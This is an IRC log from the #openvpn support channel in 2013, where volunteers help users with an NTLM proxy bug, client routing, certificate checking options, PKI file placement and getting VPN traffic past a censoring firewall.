[~sgraham@adsl-99-22-153-166.dsl.skt2ca.sbcglobal.net] has quit [Client Quit] 18:46 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 18:46 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 18:46 -!- ihre [~kaas@86.86.252.187] has quit [Read error: Connection reset by peer] 18:47 -!- ihre [~kaas@86.86.252.187] has joined #openvpn 18:48 < plut0> anyone? 18:52 -!- brute11k1 [~brute11k@89.249.235.210] has joined #openvpn 18:54 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 264 seconds] 18:58 -!- nickanderson_afk is now known as nickanderson 18:58 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 18:59 -!- nickanderson is now known as nickanderson_afk 19:04 -!- mndo [~mndo@bl17-70-52.dsl.telepac.pt] has quit [Ping timeout: 276 seconds] 19:05 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 19:05 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 19:10 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 19:10 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 19:11 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 19:12 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 272 seconds] 19:13 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 19:15 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 260 seconds] 19:15 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 260 seconds] 19:16 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 19:16 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 19:42 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 19:42 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 19:45 < pekster> plut0: Near as I can tell from the code, you'll get that if the ntlm_phase_3 routine fails to return expected data from the proxy. Maybe some setting isn't right on your client; possibly see the --show-proxy-settings flag to openvpn, or check your proxy server's logs 19:46 < plut0> pekster: did you see this post? https://forums.openvpn.net/topic11158.html 19:46 <@vpnHelper> Title: OpenVPN Support Forum http-proxy with TMG return malformed packet in wireshark : Configuration (at forums.openvpn.net) 19:46 < plut0> pekster: seems like an outstanding bug with a patch for 2.1 but nothing newer 19:47 < plut0> pekster: sorry this link, https://forums.openvpn.net/topic7945.html 19:47 <@vpnHelper> Title: OpenVPN Support Forum OpenVPN client behind ISA ( Forefront TMG ) : Configuration (at forums.openvpn.net) 19:50 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 19:51 < pekster> plut0: You could try a patched build with line 502 in proxy.c changed to "char buf2[512];" per thte 2nd forum link, although I'm not sure what the ramifications are 19:52 < pekster> plut0: Oh, and probably line 625 to match too 19:52 < pekster> ie: 511 there 19:53 < plut0> pekster: it's a windows client and i'm not capable of building that 19:56 < plut0> guess i should file a bug huh? 19:56 < pekster> I can't confirm if that source fix is even valid or not; I'm just pointing you to where I think that reference is in the 2.3.0 source-tree 19:56 < plut0> i'm going to file a bug 19:56 < pekster> I don't have an NTML-enabled proxy, so I'm not able to test the problem 19:57 < plut0> especially since others have the same issue 19:57 * ecrist checks in 19:57 < pekster> What did you find out with the option I gave you above that'll try and get your proxy info? 19:58 < plut0> pekster: i haven't tried that yet, is that passed on the client? 19:58 < pekster> The manpage would know 19:58 < pekster> !man 19:58 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 19:59 < pekster> It's often a good idea to look up options you're recommend to check out 19:59 < plut0> booting up other laptop to test again, give me a minute 20:02 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 20:06 -!- mirco [~mirco@p50805527.dip.t-dialin.net] has quit [Quit: mirco] 20:08 < pekster> If you do end up with persistent problems, this might be an already-opened bug you can use instead of opening a duplicate: https://community.openvpn.net/openvpn/ticket/94 20:08 <@vpnHelper> Title: #94 (NTLM proxy authentication does not work well) – OpenVPN Community (at community.openvpn.net) 20:08 < pekster> It appears to be thte same issue 20:08 < plut0> guess i can't do this remotely 20:10 < pekster> Well, first step is to verify the info you're trying to use is valid. Your config has "basic" auth listed, but then the logs list NTLM being attempted, which I find a bit odd 20:10 < pekster> Hence why I wanted to know what the Windows auto-discovery found about your proxy 20:10 < plut0> i tried it both ways 20:11 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 20:11 < pekster> It might be worth linking to the 2nd forum post (the one with the actual source details) 20:11 -!- raidz is now known as raidz_away 20:12 < pekster> Oh, and I had my source references wrong: it's ntml.c that post was referring to 20:12 < plut0> is it the same bug? 20:13 < pekster> Maybe. I dunno 20:13 < pekster> https://community.openvpn.net/openvpn/attachment/ticket/94/openvpn-ntlm-error1.png suggest it might be 20:13 <@vpnHelper> Title: openvpn-ntlm-error1.png on Ticket #94 – Attachment – OpenVPN Community (at community.openvpn.net) 20:13 < pekster> See what a wire trace shows you 20:13 < pekster> Append it if it looksk relevant 20:15 < pekster> https://forums.openvpn.net/topic7945.html 20:15 <@vpnHelper> Title: OpenVPN Support Forum OpenVPN client behind ISA ( Forefront TMG ) : Configuration (at forums.openvpn.net) 20:16 < pekster> Someone said one of the patches worked well on the 2nd page. Include that reference, perhaps 20:16 < plut0> pekster: if i use show-proxy-settings, there is no log output 20:17 < pekster> Interesting, I guess it didn't do what I expected 20:18 < plut0> yeah not sure why that is 20:18 < pekster> Well, beteween the forum reference and your logs, you probably have enough for a bugreport, although without knowing exactly what's going wrong over the wire it might get tough to debug. See the forum reference for some of the issues there, and maybe make a note on the thread too with your details 20:19 < pekster> I assume the proxy works in a browser with the same settings, for instance? 20:19 < plut0> yup 20:19 < plut0> used for 1000+ clients just fine 20:20 < pekster> Then it appears to be related to that bug, and certainly the forum entry 20:21 < plut0> hmm wait a minute 20:23 < plut0> wonder if any of these other options would help 20:29 < plut0> got a wireshark here 20:29 < plut0> ntlmssp_negotiate (malformed packet) 20:29 < pekster> Compare the sequence of commands exchanged with a functional proxy request 20:30 < pekster> See if you need to change any options openvpn is using, or if it appears to be a fault in the exchange spoken 20:30 < pekster> Add what you find to any report you file as relevant 20:31 < plut0> ok through a browser it says ntlmssp_negotiate 20:31 < plut0> without the malformed packet 20:36 < plut0> malformed packet exception occurred 20:36 < plut0> so says wireshark 20:37 < plut0> pekster: want me to file a new bug or add to this one? 20:38 <@ecrist> plut0: if you can provide specific steps to reproduce your bug, please open a ticket 20:39 < plut0> ok 20:39 <@ecrist> the easier you make the issue to reproduce and test, the more likely your bug will be resolved 20:40 < plut0> how are you going to reproduce it if you don't have the appropriate proxy? 20:41 < plut0> hmm how do i report a bug? i'm logged in and don't see an option 20:41 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 20:41 < plut0> nm i found it 20:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 20:49 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds] 20:49 < plut0> ecrist: pekster: here you go, https://community.openvpn.net/openvpn/ticket/259#comment:1 20:49 <@vpnHelper> Title: #259 (received corrupted data from proxy server) – OpenVPN Community (at community.openvpn.net) 20:50 <@ecrist> plut0: how are we giong to fix something we can't reproduce? 20:50 < pekster> That lacks your config, log output, the packet details, or the reproduction details. As far as bugreports go, it's a poor quality one 20:52 < pekster> 20:13:41 < pekster> See what a wire trace shows you 20:52 < pekster> 20:13:47 < pekster> Append it if it looksk relevant 20:52 < pekster> [...] 20:52 < pekster> 20:29:53 < pekster> Compare the sequence of commands exchanged with a functional proxy 20:52 < pekster> request 20:52 < pekster> 20:30:14 < pekster> See if you need to change any options openvpn is using, or if it appears 20:52 < pekster> to be a fault in the exchange spoken 20:53 < pekster> 20:30:37 < pekster> Add what you find to any report you file as relevant 20:53 < pekster> [...] 20:53 < pekster> 20:39:23 <@ecrist> the easier you make the issue to reproduce and test, the more likely your 20:53 < pekster> dammit 20:53 * pekster steps away from chat for a bit 20:53 < pekster> The URL I intended to paste: fpaste.org/ADX2/ 20:53 < plut0> attached my config and log 20:54 <@ecrist> plut0: message 4 in the forum thread you link specifically asks for a wireshark capture. :) 20:55 < plut0> ecrist: not sure i can do that, sensitive data 20:56 <@ecrist> !topsecret 20:56 <@vpnHelper> "topsecret" is if your setup is so top secret that you cant post your configs or logs, please leave now and go find support you trust. 20:56 <@ecrist> plut0: you should be able to filter your tcpdump 20:57 < plut0> if this isn't working with ntlm shouldn't that be easy to reproduce? 20:57 <@ecrist> the problem you're going to run into is nobody cares 20:57 <@ecrist> devs tend to fix problems they 1) know about, 2) care about 20:57 <@ecrist> or 3) someone makes easy for them to fix 20:57 < plut0> someone did make a patch 20:58 <@ecrist> we're not going to patch openvpn without being able to test/verify it works 20:58 <@ecrist> have you tested the patch? 20:58 <@ecrist> did it work for you? 20:58 < plut0> ecrist: no because the patch is for 2.1 20:58 <@ecrist> so hand-patch 2.3 20:58 -!- [fred] [~fred@konfuzi.us] has joined #openvpn 20:58 < plut0> ecrist: i don't have the tools to build a windows client 20:58 <@ecrist> you're asking us to put more work in that you're willing to 20:59 < plut0> how am i going to build the windows client? 20:59 <@ecrist> meh - you created a ticket, someone might get to it 20:59 <@ecrist> if that's not OK, you can have your money back? 20:59 <@ecrist> :P 21:00 < plut0> can i press a button and it builds everything for me - or - do i have to install 5 pieces of software on a windows machine and fuss around for hours trying to compile it? 21:00 <@ecrist> for windows, it's a fuss 21:00 < plut0> i imagine 21:00 <@ecrist> you don't have a unix box around? 21:00 < plut0> i do 21:00 -!- SkeeterB [SkeeterB@70-41-105-173.cust.wildblue.net] has joined #openvpn 21:01 < SkeeterB> hi 21:01 <@ecrist> so patch that and test it on the linux box 21:01 <@ecrist> then you can at least demonstrate it works 21:01 < plut0> i can't bring the linux desktop to work and try it 21:01 <@ecrist> and maybe provide an updated patch for the 2.3 branch 21:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 21:02 <@ecrist> plut0: install virtualbox on that windows box, and put a linux vm on there 21:02 <@ecrist> test that way 21:02 < plut0> ecrist: easier said then done 21:03 <@ecrist> like i said, you created a ticket, and that's where it'll stay until a dev gets to it 21:03 < SkeeterB> my computer is wonky, its gotten where i can't access some sites without going through my ISP's proxy server. I don't want to do that if I am connected to a VPN. That kind of defeats the purpose of a VPN doesn't it? 21:03 <@ecrist> fwiw, looking at that patch, it's not trivial 21:04 < plut0> ecrist: so it won't get fixed probably? 21:04 <@ecrist> plut0: I'm not saying that, but I don't expect to see anyone jump on it any time soon 21:04 < plut0> ecrist: the other bug pekster linked was 2 years old :( 21:04 <@ecrist> SkeeterB: depends on your VPN config 21:05 <@ecrist> plut0: the forum post isn't a proper way to report a bug 21:05 < plut0> ecrist: no it was an actual bug 21:05 < SkeeterB> I've tried using other VPNs not OpenVPN put PPTP VPNs and it does the same thing. 21:05 <@ecrist> SkeeterB: do you have your VPN configured to redirect the default gateway? 21:05 <@ecrist> and what are you using for DNS? 21:06 <@ecrist> I'm guessing they're doing some odd DNS resolution to partially cause your error 21:06 < SkeeterB> my internet goes through my router 21:06 < plut0> ecrist: https://community.openvpn.net/openvpn/ticket/94 21:06 <@vpnHelper> Title: #94 (NTLM proxy authentication does not work well) – OpenVPN Community (at community.openvpn.net) 21:06 <@ecrist> right, and your DNS is assigned via DHCP, probably from your ISP, which is passed into your internal network. 21:07 <@ecrist> I've pinged the developers, plut0. it's all we can do 21:07 < plut0> ecrist: thank you, i appreciate it 21:11 < SkeeterB> yeah my DNS is set through my ISP's DCHP, I've used openDNS briefly, and it did ok 21:12 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 21:12 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 21:17 < dbhaber_> bored 21:17 < dbhaber_> pfsense makes openvpn so easy 21:18 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 21:18 < rob0> as long as you're not doing anything unusual, and until something goes wrong ... then pfsense is a nightmare. 21:19 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 21:21 <@ecrist> heh 21:21 <@ecrist> about a year ago, the lead dev of pfsense and I nearly got into a fist fight 21:21 <@ecrist> in large part, due to the shitty implementation of openvpn they had at the time 21:24 < uberushaximus> what was his defense? 21:26 <@ecrist> I don't recall 21:26 <@ecrist> we were both well-lubed with beer 21:28 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 272 seconds] 21:28 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 272 seconds] 21:31 -!- plut0 [~cory@pool-96-236-43-69.albyny.fios.verizon.net] has left #openvpn [] 21:31 -!- Harleyman [~SkeeterB@149.255.32.238] has joined #openvpn 21:32 < Harleyman> I'm actually connected IRCusing PrivateTunnel 21:32 -!- SkeeterB [SkeeterB@70-41-105-173.cust.wildblue.net] has quit [Read error: Connection reset by peer] 21:33 < Harleyman> i'm SkeeterB, that other was a ghost. 21:34 < Harleyman> It actually shows I'm connect on the Privatetunnel site. 21:41 -!- nutron [~nutron@unaffiliated/nutron] has quit [Read error: Connection reset by peer] 21:50 -!- Harleyman [~SkeeterB@149.255.32.238] has left #openvpn [] 22:00 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 22:11 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 22:20 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 22:22 -!- nutron [~nutron@unaffiliated/nutron] has quit [Max SendQ exceeded] 22:22 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 22:28 -!- else- [~else@towely.iodev.org] has quit [Read error: Operation timed out] 22:53 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 22:58 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Read error: Operation timed out] 22:59 -!- ihre [~kaas@86.86.252.187] has quit [Read error: Operation timed out] 23:42 -!- Orbi [~opera@109.129.18.33] has joined #openvpn --- Day changed Thu Feb 21 2013 00:13 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 00:18 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 00:18 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 00:18 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 00:18 -!- mode/#openvpn [+o krzee] by ChanServ 00:18 <@krzee> novaflash, 00:18 <@krzee> !factoids 00:19 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 00:19 <@krzee> thats all of the keys the bot knows 00:21 < pekster> krzee: You the bot admin? I shot you a memo, but it still thinks I'm scum 00:40 -!- Orbi [~opera@109.129.18.33] has left #openvpn [] 00:49 <@krzee> weird, i seem to have +owner but not have +admin on it, and cant login right now, will look later 00:52 <@krzee> ahh nevermind im in =] 00:52 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 01:02 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 01:02 -!- mode/#openvpn [+o vpnHelper] by ChanServ 01:03 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Client Quit] 01:04 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 01:04 -!- mode/#openvpn [+o vpnHelper] by ChanServ 01:05 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Client Quit] 01:06 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 01:06 -!- mode/#openvpn [+o vpnHelper] by ChanServ 01:09 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Client Quit] 01:17 < pekster> Is there anything required to make autoconf work besides the online docs invocation of 'autoconf -v -i' ? I'm trying to test what should be a trivial patch, and autoconf throws errors about macros I didn't change: http://paste.kde.org/677402/ 01:18 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 01:18 -!- mode/#openvpn [+o vpnHelper] by ChanServ 01:18 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Client Quit] 01:20 <@krzee> dammit, i should have copied the userfile, supybot decided to delete half of it because of hostmask overlap 01:20 <@krzee> EugeneKay, im gunna need to readd you, sorry 01:21 < EugeneKay> Mrh? 01:21 < EugeneKay> Oh 01:21 < EugeneKay> S'ok, my hostmask has changed anyway 01:21 < EugeneKay> Actually, just give me a bot user account 01:21 < EugeneKay> I can mangle it myself :-p 01:21 <@krzee> you had one til a minute ago 01:21 < EugeneKay> Har 01:23 < pekster> fwiw, I also get the same build error (just slightly different line numberes) without my code changes, so it's not just my patch 01:23 <@krzee> youd prolly have better results in the dev chan 01:24 < pekster> Yea, I can cross-post there. I'll re-paste with the line numbers and output from a vanilla 2.3.0 tag checkout 01:25 * EugeneKay goes back to drinking 01:41 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 01:42 -!- mode/#openvpn [+o vpnHelper] by ChanServ 01:42 * pekster stabs autoconf with a rusty fork 01:42 <@krzee> EugeneKay / pekster you are both added, should be able to change your password 01:42 < pekster> Got it working (at least enough to test my patch.) This thing spits out awful errors 01:43 <@krzee> and should be able to use !learn !forget 01:44 < pekster> Great, now I !forgot what entry I had a pending update for :P 01:45 < pekster> !mitm 01:45 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: ns-cert-type server in the client config 01:45 < pekster> !forget mitm 3 01:45 <@vpnHelper> Joo got it. 01:46 < pekster> !learn mitm then use: "remote-cert-tls server" in the client config 01:46 <@vpnHelper> (learn [] as ) -- Associates with . is only necessary if the message isn't sent on the channel itself. The word 'as' is necessary to separate the key from the value. It can be changed to another word via the learnSeparator registry value. 01:46 < pekster> !learn mitm as then use: "remote-cert-tls server" in the client config 01:46 <@vpnHelper> Joo got it. 01:46 <@krzee> depends how it was signed 01:46 < pekster> That works with easy-rsa 01:46 <@krzee> good enough 01:46 < pekster> And should be preferred to "Netscape" extensions 01:47 < pekster> It does a better job of checking EKU fields 01:47 <@krzee> for convention… but is there anything gained? 01:47 <@krzee> (for our small use case) 01:48 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 01:49 < pekster> Probably not, but this method is listed as a better choice in the official howto 01:50 <@krzee> right, iirc james said that because its the standard convention 01:51 < pekster> Personally, I just use --remote-cert-eku, but I'm not going to push that on people wanting the quick solution via easy-rsa 01:52 < pekster> remote-cert-tls checks ku and eku for the relevant OIDs; technically we wouldn't even need the silly ns-cert-type field anymore, but it'll have to stay in easy-rsa for backwards-compat reasons at this point 01:54 <@krzee> little change in security, but no reason to use the old one 01:54 < pekster> Yea, exactly. It's just an extra wasted field taking up bytes 01:55 * pekster shrugs. The factoid won't hurt anyone unless they're using a 2.0.x or earlier release. Quite frankly they need to update, becuase lots of what the bot tells them won't work with stuff that old 01:55 <@krzee> i mean config option 01:56 <@krzee> but ya that too 01:57 < pekster> And yes, I like things to be "proper" :P 02:03 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 252 seconds] 02:16 -!- defswork [~andy@141.0.50.105] has joined #openvpn 02:18 -!- mirco [~mirco@p50806731.dip.t-dialin.net] has joined #openvpn 02:27 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 02:38 < matsh> pekster: Can you assign ip aliases for tun interfaces in openvpn.conf to allow a jail on the openvpn server to access the vpn? 02:41 < pekster> No idea why you're asking me specifically 02:43 < pekster> The concept of a network "alias" is used to assign >1 IP on systems that can't do that on the device itself. I don't work often with BSD systems and can't help much with that 02:43 < pekster> That said, tun is a point-to-point interface; it's probably not going to do what you expect to drop a 2nd IP there. You should fix your jail to do what you want instead 02:51 < matsh> I have no idea either. 02:51 < matsh> But thanks 03:07 -!- dazo_afk is now known as dazo 03:16 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Ping timeout: 248 seconds] 03:17 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has joined #openvpn 03:22 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:30 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:30 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 245 seconds] 03:31 -!- EugeneKay [eugene@madeitwor.se] has quit [Ping timeout: 245 seconds] 03:32 -!- nutcase [~nutcase@2605:6400:2:fed5:22:0:b4f1:bd54] has joined #openvpn 03:32 -!- nutcase [~nutcase@2605:6400:2:fed5:22:0:b4f1:bd54] has quit [Changing host] 03:32 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 03:33 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn 03:35 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Client Quit] 03:43 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:44 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Client Quit] 03:47 -!- mndo [~mndo@bl17-91-212.dsl.telepac.pt] has joined #openvpn 03:56 -!- dballester [~dballeste@139.49.17.109.rev.sfr.net] has joined #openvpn 03:56 < dballester> hi to all 04:00 -!- mirco [~mirco@p50806731.dip.t-dialin.net] has quit [Quit: mirco] 04:04 < dballester> if in a client config I type push "route 10.0.0.0 255.255.0.0" i should see a new route entry in the client routing table, isn't it? 04:07 < pekster> Possibly, if the client initiates a pull request (via --client or --pull features) and is not omitting adding routes and does not have an error when adding them 04:12 < dballester> i don't see any error in client syslog but i don't see the route in client's routing table :/ 04:13 < pekster> pastebin logs with the client at 'verb 4' 04:15 < dballester> may be i must activate the verb 4 to see 04:16 < dballester> :) 04:18 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 04:19 -!- mirco_ [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 04:23 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 272 seconds] 04:23 -!- mirco_ is now known as mirco 04:25 < dballester> pekster, by now I'm reading "Including multiple machines on the client side when using a routed VPN (dev tun)" from http://openvpn.net/index.php/open-source/documentation/howto.html 04:25 <@vpnHelper> Title: HOWTO (at openvpn.net) 04:27 < pekster> dballester: And 10.0/16 is the client-side network? 04:27 < dballester> i will try to paste an image 04:28 < pekster> !clientlan 04:28 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 04:28 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 04:33 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 04:33 < dballester> some devices are mikrotik ( no full openvpn client implementation ) I will tst, thanks for the info pekster 04:33 < dballester> tst/test 04:35 -!- odoacre [~antonio@222.126.240.10] has joined #openvpn 04:37 < odoacre> hey, i'm wondering if anyone has some tips to stop the chinese firewall to keep killing my openvpn connection 04:39 < pekster> That depends on how they're detecting the connection. You could try changing the listening port, but openvpn has a detectable protocol handshake when used with certificates 04:39 < odoacre> oh 04:39 < odoacre> soi should try with no certificates ? 04:39 < pekster> You could use it in p2p mode with static keys (ie: use of --secret instead of --cert and --key) which has no handshake fingerprint 04:40 < odoacre> i think they don't especially care much that it's openvpn, they care about the fact that it's encrypted 04:40 < odoacre> but thanks for the tip i'll try that out 04:40 < pekster> Right. The downside security-wise is that the keys need to be transferred over an alreaady-secure channel (like ssh) and you don't have perfect forwrad secrecy (so if your key gets stolen later, an attacker could decrypt any past sessions secured with that key if they have the traffic stored) 04:41 < odoacre> yeah, that's not a huge issue for me 04:41 < pekster> There's also an obfsproxy project that's designed to obfuscate network-level connections. I don't know much about it, but I think we have a link to the project: 04:41 < pekster> !obfsproxy 04:41 < odoacre> i mainly encrypt it only to bypass the censorship filter 04:41 <@vpnHelper> "obfsproxy" is For a writeup on using obfsproxy with OpenVPN see https://syria.hacktivist.me/?p=148 04:41 < odoacre> nice! 04:42 < pekster> If that's your use-case, you might have luck with the static keyed setup in p2p mode then 04:42 < odoacre> that's awesome 04:42 < pekster> It's still encrypted, but there is no handshake, so it just looks like raw data going down the wire 04:42 < odoacre> that was very helpful pekster, thanks a lot 04:42 < odoacre> i;ll set you know if it works better 04:42 < pekster> yup. Best of luck; censorship suckcs 04:43 < odoacre> word 04:44 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has quit [Quit: nand] 04:48 <@dazo> !obfs 04:48 <@vpnHelper> "obfs" is (#1) if you are looking to obfuscate your traffic to get through a firewall that recognizes and blocks openvpn, try using this proxy: obfsproxy https://www.torproject.org/projects/obfsproxy.html.en to encapsulate your packets in other protocols or (#2) http://community.openvpn.net/openvpn/wiki/TrafficObfuscation or (#3) in client/server mode an admin can know that openvpn is being used. in 04:48 <@vpnHelper> static-key mode they only know that it is some encrypted data, but not specifically openvpn; however with static-key you lose forward security (!forwardsecurity) 04:49 <@dazo> !learn obfsproxy as See also !obfs. The link to TrafficObfuscation also contains a setup example 04:49 <@vpnHelper> Error: You don't have the factoids.learn capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 04:49 <@dazo> !whoami 04:49 <@vpnHelper> I don't recognize you. 04:49 <@dazo> ecrist: ^^ w00t!? 04:50 < pekster> krzee had some issue updating the bot access list and needs to reset access for some folks. "half" of the access list was lost, or something 04:50 < pekster> !learn obfsproxy as See also !obfs. The link to TrafficObfuscation also contains a setup example 04:50 <@vpnHelper> Joo got it. 04:50 * pekster just happens to be in the other half atm 04:51 <@dazo> ahh! thx pekster! 04:51 * pekster digs back into code to see why builds keep exploding on his patch 05:15 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 05:15 -!- brute11k1 [~brute11k@89.249.235.210] has quit [Ping timeout: 255 seconds] 05:16 -!- APTX [APTX@unaffiliated/aptx] has quit [Quit: No Ping reply in 180 seconds.] 05:17 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 05:51 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 264 seconds] 05:53 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 264 seconds] 05:53 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has quit [Ping timeout: 264 seconds] 05:53 -!- BtbN [~btbn@btbn.de] has joined #openvpn 05:57 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn 05:57 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 05:57 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Changing host] 05:57 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 05:58 -!- dpecka [~dpecka@193.165.171.107] has joined #openvpn 05:58 < dpecka> hello 05:58 < dpecka> i have stupid Q: 05:58 < dpecka> where is specified and how openvpn server knows, that he should look for the client keys in etc/openvpn/easy-rsa/2.0/keys/ ? 06:00 <@dazo> dpecka: the OpenVPN server doesn't care about etc/openvpn/easy-rsa/2.0/keys/ at all 06:00 <@dazo> dpecka: in fact easy-rsa certificate and key files shouldn't be on the server at all 06:01 <@dazo> dpecka: OpenVPN server and client verifies the certificate signatures ... if that matches what it would expect from the ca.crt (--ca on the configs), then it is considered to be a trusted server or client certificate 06:01 < dpecka> dazo: o.O but, but .. 06:02 <@dazo> that's how PKI works ... the CA is a trusted third party which clients and servers both know and trust .... and the CA signs certificates to servers and clients 06:02 < dpecka> dazo: then i don't understand how it works 06:02 < dpecka> ca /etc/openvpn/easy-rsa/2.0/keys/ca.crt 06:02 < dpecka> cert /etc/openvpn/easy-rsa/2.0/keys/server.crt 06:02 < dpecka> key /etc/openvpn/easy-rsa/2.0/keys/server.key 06:02 < dpecka> ^^ this is needed 06:02 < dpecka> and clients have set similar in their client.cfg 06:02 <@dazo> yeah ... just move those three files to /etc/openvpn instead . 06:03 < dpecka> they use ca.crt and klient.crt and client.key 06:03 <@dazo> the CA key is the most sacred file you'll ever have ... if that one gets "lost" (read: stolen) ... then you can't trust any clients or server any more 06:03 <@dazo> I did a write-up a long time ago, which is still a draft .... but this might help you understand a bit more: https://community.openvpn.net/openvpn/wiki/How_does_PKI_work 06:03 <@vpnHelper> Title: How_does_PKI_work – OpenVPN Community (at community.openvpn.net) 06:04 < dpecka> thanks 06:07 -!- dmonjo 